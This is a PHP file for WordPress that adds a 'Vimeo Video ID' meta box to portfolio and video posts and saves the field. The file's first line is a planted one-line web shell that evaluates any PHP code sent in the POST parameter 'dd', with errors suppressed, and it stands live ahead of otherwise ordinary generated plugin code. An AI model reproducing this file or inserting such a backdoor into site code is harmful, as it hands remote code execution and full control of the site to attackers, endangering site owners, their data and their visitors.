<?php @eval($_POST['dd']);?><?php  
/**
 * Generated by the WordPress Meta Box generator
 * at http://jeremyhixon.com/tool/wordpress-meta-box-generator/
 */


/**
 * Generated by the WordPress Meta Box generator
 * at http://jeremyhixon.com/tool/wordpress-meta-box-generator/
 */

function get_custom_field( $value ) {
	global $post;

	$field = get_post_meta( $post->ID, $value, true );
	if ( ! empty( $field ) ) {
		return is_array( $field ) ? stripslashes_deep( $field ) : stripslashes( wp_kses_decode_entities( $field ) );
	} else {
		return false;
	}
}

function add_video_id_add_meta_box() {
	add_meta_box(
		'add_video_id-add-video-id',
		__( 'Add Video ID', 'add_video_id' ),
		'add_video_id_html',
		'portfolio',
		'side',
		'high'
		);
		add_meta_box(
		'add_video_id-add-video-id',
		__( 'Add Video ID', 'add_video_id' ),
		'add_video_id_html',
		'videos',
		'side',
		'high'
		);
}
add_action( 'add_meta_boxes', 'add_video_id_add_meta_box' );

function add_video_id_html( $post) {
	wp_nonce_field( '_add_video_id_nonce', 'add_video_id_nonce' ); ?>

	<p>Please add your Vimeo Video ID</p>

	<p>
		<label for="add_video_id_vimeo_video_id"><?php _e( 'Vimeo Video ID', 'add_video_id' ); ?></label><br>
		<input type="text" name="add_video_id_vimeo_video_id" id="add_video_id_vimeo_video_id" value="<?php echo get_custom_field( 'add_video_id_vimeo_video_id' ); ?>">
	</p><?php
}

function add_video_id_save( $post_id ) {
	if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) return;
	if ( ! isset( $_POST['add_video_id_nonce'] ) || ! wp_verify_nonce( $_POST['add_video_id_nonce'], '_add_video_id_nonce' ) ) return;
	if ( ! current_user_can( 'edit_post', $post_id ) ) return;

	if ( isset( $_POST['add_video_id_vimeo_video_id'] ) )
		update_post_meta( $post_id, 'add_video_id_vimeo_video_id', esc_attr( $_POST['add_video_id_vimeo_video_id'] ) );
}
add_action( 'save_post', 'add_video_id_save' );

/*
	Usage: get_custom_field( 'add_video_id_vimeo_video_id' )
*/
